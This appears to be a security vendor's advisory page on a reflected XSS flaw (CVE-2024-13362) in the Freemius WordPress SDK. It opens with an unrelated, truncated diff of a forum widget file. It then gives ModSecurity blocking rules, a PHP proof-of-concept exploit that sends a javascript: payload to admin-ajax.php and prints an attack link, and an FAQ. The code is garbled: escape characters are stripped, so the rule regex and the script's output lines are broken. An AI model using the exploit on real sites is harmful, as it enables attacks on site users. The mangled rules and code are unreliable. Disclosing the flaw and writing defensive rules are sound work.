+			'posts_per_page' => ! empty( $settings['ppp2'] ) ? $settings['ppp2'] : 9,
+			'order'          => $settings['order'],
+		) );
+
+		include( "inc/forum/forum_tab.php" );
+	}
 }
 No newline at end of file
--- a/bbp-core/includes/Elementor/Forum_posts.php
+++ b/bbp-core/includes/Elementor/Forum_posts.php
@@ -1,143 +1,143 @@
-<?php
-
-namespace adminElementor;
-
-use ElementorWidget_Base;
-use ElementorControls_Manager;
-use ElementorGroup_Control_Typography;
-use ElementorGroup_Control_Text_Shadow;
-use WP_Query;
-use WP_Post;
-
-// Exit if accessed directly
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-
-/**
- * Class Forum_posts
- *
- * @package amaCoreWidgets
- */
-class Forum_posts extends Widget_Base {
-
-	public function get_name() {
-		return 'ama_forum_posts';
-	}
-
-	public function get_title() {
-		return __( 'BBPC Forum Topics', 'bbp-core' );
-	}
-
-	public function get_icon() {
-		return 'bbpc_icon_ama_forum_posts';
-	}
-
-	public function get_keywords() {
-		return [ 'topics', 'replies' ];
-	}
-
-	// style dependency
-	public function get_style_depends() {
-		return [ 'bbpc-el-widgets' ];
-	}
-
-	public function get_categories() {
-		return [ 'bbp-core' ];
-	}
-
-	protected function register_controls() {
-
-		// --- Filter Options
-		$this->start_controls_section(
-			'filter_opt', [
-				'label' => __( 'Filter Options', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'ppp', [
-				'label'       => esc_html__( 'Show Forum Topics', 'bbp-core' ),
-				'type'        => Controls_Manager::NUMBER,
-				'default'     => 5
-			]
-		);
-
-		$this->add_control(
-			'order', [
-				'label'   => esc_html__( 'Order', 'bbp-core' ),
-				'type'    => Controls_Manager::SELECT,
-				'options' => [
-					'ASC'  => 'ASC',
-					'DESC' => 'DESC'
-				],
-				'default' => 'ASC'
-			]
-		);
-
-		$this->end_controls_section();
-		// end Document Setting Section
-	}
-
-	protected function render() {
-		$settings    = $this->get_settings();
-		$forum_posts = new WP_Query( array(
-			'post_type'      => 'topic',
-			'posts_per_page' => ! empty( $settings['ppp'] ) ? $settings['ppp'] : - 1,
-			'order'          => $settings['order'] ? $s

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius XSS via url parameter in AJAX',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_POST:action "@streq fs_connect" "chain"
    SecRule ARGS_POST:url "@rx (?:javascript|data|vbscript|alert|onerror|onload|onclick|prompt|eval)" "t:lowercase,t:urlDecode,chain"
      SecRule ARGS_POST:url "@rx [<>'\(]" "t:lowercase,t:urlDecode"

SecRule REQUEST_URI "@rx ^/wp-admin/admin.php" 
  "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_GET:url "@rx ^javascript:" "t:lowercase,t:urlDecode"

SecRule REQUEST_URI "@rx ^/wp-json/freemius/vd+/" 
  "id:20261996,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius XSS via url parameter in REST',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:url "@rx (?:javascript|data|vbscript):" "t:lowercase,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

<?php
/**
 * Proof of Concept for CVE-2024-13362
 * Demonstrates reflected XSS via the 'url' parameter in Freemius checkout flow.
 * 
 * Requirements: PHP with cURL extension
 * Usage: php exploit.php
 */

// Target WordPress site (modify this)
$target_url = 'http://example.com';

// Malicious XSS payload - this will execute in the browser context
$xss_payload = 'javascript:alert("Atomic Edge XSS PoC - CVE-2024-13362")';

// Craft the exploit URL
$exploit_url = $target_url . '/wp-admin/admin-ajax.php';
$params = [
    'action' => 'fs_connect',
    'url' => $xss_payload
];

// Initialize cURL session
echo "[+] Sending exploit request to target: $target_urln";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check if the payload was reflected
echo "[+] HTTP Response Code: $http_coden";
echo "[+] Response length: " . strlen($response) . " bytesn";

if (strpos($response, $xss_payload) !== false) {
    echo "[!] VULNERABLE: XSS payload reflected in responsen";
    echo "[!] Proof: $exploit_url?url=" . urlencode($xss_payload) . "n";
} else {
    echo "[-] Target may be patched or unreachablen";
}

// Alternative: Craft a direct link for manual testing
echo "n[+] Alternative manual test URL:n";
echo "$target_url/wp-admin/?page=freemius-checkout&url=" . urlencode('javascript:alert("XSS")');
echo "nn[+] To test in browser, click the link above or craft as HTML hrefn";

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK versions up to 2.10.1. It allows unauthenticated attackers to inject arbitrary JavaScript code via the ‘url’ parameter, which can execute in the context of a victim’s browser session.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation and output escaping of the ‘url’ parameter in various WordPress plugins and themes using the Freemius SDK. Attackers can craft a malicious URL containing JavaScript code that gets executed when a user clicks the link, leading to potential session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Freemius SDK version 2.10.1 or earlier is potentially affected. Administrators should check their installed plugins for the Freemius SDK and verify if they are using a vulnerable version.
How can I check if my site is vulnerable?
Steps for vulnerability assessment
To check for vulnerability, verify if your site uses the Freemius SDK and confirm the version. If the version is 2.10.1 or earlier, your site is at risk. Additionally, review the plugin documentation or changelog for any mentions of CVE-2024-13362.
What is the CVSS score and what does it mean?
Understanding severity levels
The CVSS score for CVE-2024-13362 is 6.1, categorized as medium severity. This indicates that while the vulnerability requires user interaction to exploit, it can still pose significant risks, especially in contexts where sensitive operations are performed.
How can I fix or mitigate the issue?
Recommended actions for administrators
To mitigate the vulnerability, update the Freemius SDK to version 2.10.2 or later, which includes necessary patches for input validation and output escaping. Additionally, review and sanitize any user-supplied data before rendering it in the DOM.
What are the potential risks if the vulnerability is exploited?
Consequences of successful attacks
If exploited, an attacker can execute arbitrary JavaScript in the victim’s browser, potentially leading to session hijacking, cookie theft, or unauthorized actions within the WordPress admin area. This can result in severe consequences, including data loss or site defacement.
What is reflected XSS?
Defining the attack type
Reflected XSS is a type of vulnerability where the injected script is reflected off a web server, typically via a URL parameter. The script executes in the user’s browser when they click a malicious link, making it necessary for the attacker to trick the user into clicking the link.
How does the proof of concept demonstrate the issue?
Explaining the PoC
The proof of concept provided illustrates how an attacker can craft a malicious URL with an XSS payload targeting the ‘url’ parameter. By executing this payload, the attacker can demonstrate the execution of arbitrary JavaScript in the victim’s browser, showcasing the vulnerability’s potential impact.
What steps should I take after applying the patch?
Post-fix recommendations
After applying the patch, monitor your site for any unusual activity and ensure that all plugins and themes are up to date. Regularly review security practices and consider implementing additional security measures such as web application firewalls.
Are there any other vulnerabilities associated with Freemius?
Exploring related security concerns
While CVE-2024-13362 is a specific vulnerability, it is essential to stay informed about other vulnerabilities associated with the Freemius SDK or any plugins using it. Regularly check security advisories and update all components to maintain a secure WordPress environment.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow security blogs, and regularly check the National Vulnerability Database (NVD) or similar resources. Additionally, consider using security plugins that provide alerts for known vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations